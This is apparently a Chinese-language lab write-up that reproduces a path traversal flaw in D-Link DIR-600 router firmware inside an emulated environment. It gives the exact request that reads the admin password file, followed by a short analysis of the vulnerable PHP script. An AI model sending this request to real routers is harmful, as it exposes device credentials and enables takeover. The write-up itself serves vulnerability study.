漏洞描述
D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, as demonstrated by discovering the admin password
具有 v2.x 固件的 D-Link DIR-600 Rev Bx 设备允许远程攻击者通过 model/__show_info.php?REQUIRE_FILE= 绝对路径遍历攻击读取密码,如发现管理员密码所示
漏洞复现
环境
- 虚拟机:AttifyOS3.0(Ubuntu18)
- 固件版本:DIR600B FW205b01.bin
- 工具:IDA、binwalk
固件仿真
./fat.py firmpath
输入192.168.0.1验证仿真成功。
输入192.168.0.1/model/__show_info.php?REQUIRE_FILE=%2Fetc%2Ftemplates%2Fhttpd%2Fhttpasswd.php即可获得账号密码。
漏洞分析
CVE描述中介绍通过model/__show_info.php?REQUIRE_FILE= 绝对路径遍历攻击读取密码,查看__show_info.php,发现文件调用函数。
搜索关键字发现httpasswd.php与密码相关。
故调用该文件,绝对路径为/etc/templates/httpd/httpasswd.php